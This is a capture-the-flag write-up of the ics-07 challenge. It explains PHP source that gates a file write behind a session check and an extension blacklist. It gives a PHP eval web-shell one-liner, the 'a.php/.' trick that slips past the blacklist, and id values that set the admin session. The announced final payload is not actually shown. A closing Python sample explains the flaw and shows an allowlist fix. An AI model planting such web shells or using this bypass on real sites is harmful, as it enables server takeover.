Attack and defense world ----- ics-07
2022-07-26 21:36:00 【jjj34】
After opening the challenge, work through it step by step.

The source code is shown directly. The PHP part is divided into three sections.
The first section checks whether the page parameter is present.
<?php
session_start();
if (!isset($_GET[page])) {
    show_source(__FILE__);
    die();
}// if page is missing, show this file's source and stop
if (isset($_GET[page]) && $_GET[page] != 'index.php') {
    include('flag.php');
} else {// if page is set and equals index.php, the else branch redirects to ?page=flag.php
    header('Location: ?page=flag.php');
}
?>
Overall, this section requires a page parameter; any value other than index.php will do.
The second section: if the session has a value, two parameters can be passed in.
<?php
if ($_SESSION['admin']) {
    $con = $_POST['con'];
    $file = $_POST['file'];
    $filename = "backup/".$file;// file is appended to filename
    if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
        // Regex filter on filename: . matches any character except a newline, + means the previous element one or more times
        // \. matches a literal dot
        // p[3457]? means p followed by an optional 3, 4, 5 or 7, i.e. p, p3, p4, p5 or p7
        // Overall it matches values ending in .php, .php3, .php4, .php5, .php7, .pht or .phtml (case-insensitive)
        die("Bad file extension");
    }else{
        chdir('uploaded');// change the working directory to uploaded
        $f = fopen($filename, 'w'); // open the file for writing: truncate it if it exists, create it if it does not
        fwrite($f, $con);// $f is the file handle, $con is the content written to it
        fclose($f);
    }
}
?>
Overall, once the regex is passed, a one-liner can be written to a file.
Because that regex matches every filename ending in .php, a parsing vulnerability has to be used.
The third section: the key to reaching the second section is that the session has a value, and the third section is where the session is assigned.
<?php
if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {// id is taken from GET; it must not be 1 and must end with 9, e.g. 1a9 or 1*9, as long as it is not a normal number
    include 'config.php';
    $id = mysql_real_escape_string($_GET[id]);// escape the incoming id string to prevent SQL injection
    $sql="select * from cetc007.user where id='$id'";
    $result = mysql_query($sql);// query the database
    $result = mysql_fetch_object($result);
} else {
    $result = False;
    die();
}
if(!$result)die("<br >something wae wrong ! <br>");
if($result){// if result has a value above, session becomes true and the second section can be reached
    echo "id: ".$result->id."</br>";
    echo "name:".$result->user."</br>";
    $_SESSION['admin'] = True;
}
?>
Combining the three sections, the conclusion is:
1. Pass in a page parameter; any value other than index.php is fine.
2. With the session set to true, since con is not filtered at all, con can simply be a one-liner:
con=<?php @eval($_POST['666']);?>
Because file is filtered, file needs the parsing vulnerability trick: file=a.php/.
3. To satisfy the if condition, the value of id cannot be a normal integer; it needs to look like 1a9 or 1iii9: as long as there is something between the 1 and the 9 (and it is not a normal integer such as 199), it works.
The final payload is as follows:

One thing to be careful about is the URL: the second section contains a chdir() call, which switches the working directory.
chdir('uploaded') switches the directory to uploaded, and filename = backup/1.php,
so the address is not /backup/1.php but uploaded/backup/1.php.
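To show concretely why the extension blacklist above lets a.php/. through, what path the chdir('uploaded') write actually lands on, and what an allowlist check looks like instead, here is an added Python port of the check (not the challenge's own PHP); the ALLOWED_EXTENSIONS set is an assumption for a backup endpoint.

```python
import os.path
import re

# Ported verbatim from the challenge's preg_match('/.+\.ph(p[3457]?|t|tml)$/i', ...)
BLACKLIST = re.compile(r'.+\.ph(p[3457]?|t|tml)$', re.IGNORECASE)

# Assumed allowlist of what a backup endpoint legitimately stores (not from the challenge)
ALLOWED_EXTENSIONS = {"txt", "log", "json"}


def weak_check_blocks(file: str) -> bool:
    """True when the original blacklist rejects the name (the die('Bad file extension') branch).

    The pattern is anchored at the end of the whole path, so anything appended after
    the extension, such as the trailing '/.' the write-up uses, is not matched at all.
    """
    return BLACKLIST.search(file) is not None


def write_path(file: str) -> str:
    """Where the challenge really writes: chdir('uploaded') followed by "backup/" . $file.

    normpath shows what the filesystem layer makes of the trailing '/.' after the
    regex has already been passed: the same file as a plain a.php.
    """
    return os.path.normpath(os.path.join("uploaded", "backup/" + file))


def hardened_check_allows(file: str) -> bool:
    """Allowlist replacement for the blacklist.

    Reject anything that is not a plain basename (no separators, dot segments or a
    trailing '/.'), then require an explicitly allowed extension instead of trying
    to enumerate every dangerous one.
    """
    if not file or "/" in file or "\\" in file or file in (".", ".."):
        return False
    if file != os.path.basename(file) or file.startswith("."):
        return False
    root, ext = os.path.splitext(file)
    return bool(root) and ext[1:].lower() in ALLOWED_EXTENSIONS


if __name__ == "__main__":
    for name in ("a.php", "a.PHTML", "a.php/.", "report.txt", "../report.txt"):
        print(f"{name:14} blacklist blocks={weak_check_blocks(name)!s:5} "
              f"allowlist allows={hardened_check_allows(name)!s:5} -> {write_path(name)}")
```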